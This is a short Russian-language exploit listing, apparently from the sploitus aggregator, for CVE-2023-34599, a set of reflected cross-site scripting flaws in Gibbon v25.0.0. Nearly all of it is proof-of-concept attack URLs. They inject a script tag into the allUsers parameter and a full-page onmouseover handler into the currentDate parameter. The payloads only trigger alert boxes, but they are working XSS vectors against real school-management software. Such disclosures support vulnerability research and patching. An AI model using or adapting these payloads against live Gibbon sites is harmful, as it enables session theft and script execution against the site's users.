## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-MADDSEC-CVE-2023-34599
# CVE-2023-34599
В Gibbon v25.0.0 обнаружено несколько уязвимостей межсайтового скриптинга (XSS), которые позволяют злоумышленникам выполнять произвольный JavaScript-код.
# Подтверждение концепции
# Параметр allUsers
http://gibbon.local/index.php?q=/modules/Timetable Admin/courseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4'>lo352 http://gibbon.local/index.php?q=%2fmodules%2fTimetable%20Admin%2fcourseEnrolment_manage_byPerson_edit.php&gibbonPersonID=0000000001&gibbonSchoolYearID=025&type=Staff&allUsers=rcnk4%27%3e%3cscript%3ealert(1)%3c%2fscript%3elo352

# Параметр currentDate
http://gibbon.local/index.php?q=/modules/Departments/department_course_class.php&gibbonCourseClassID=00002426¤tDate=ceb7h"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f74wd